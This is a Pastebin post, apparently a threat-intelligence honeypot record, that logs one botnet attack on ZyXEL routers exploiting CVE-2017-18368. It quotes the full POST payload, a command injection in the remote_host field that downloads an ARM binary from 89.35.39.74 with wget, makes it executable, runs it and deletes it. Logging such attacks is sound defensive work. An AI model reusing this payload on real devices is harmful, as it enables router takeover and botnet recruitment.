Advertisement
internetweather

Botnet C2 89.35.39.74

Nov 9th, 2019
821
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.45 KB | None | 0 0
  1. Source IP: 178.223.166.192
  2. Reverse DNS: 178-223-166-192.dynamic.isp.telekom.rs
  3. Country: Serbia
  4. User Agent: Ankit
  5. Payload: POST /cgi-bin/ViewLog.asp HTTP/1.1
  6. POST Data: " remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=;cd /tmp;wget http://89.35.39.74/arm7;chmod 777 arm7;./arm7 zyxel;rm -rf arm7;#&r"
  7. Target Port: 80
  8. Bad Packets® Tags: ZyXEL RCE | Router | CVE-2017-18368
  9. Date Last Seen: 2019-11-09T15:13:52Z
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement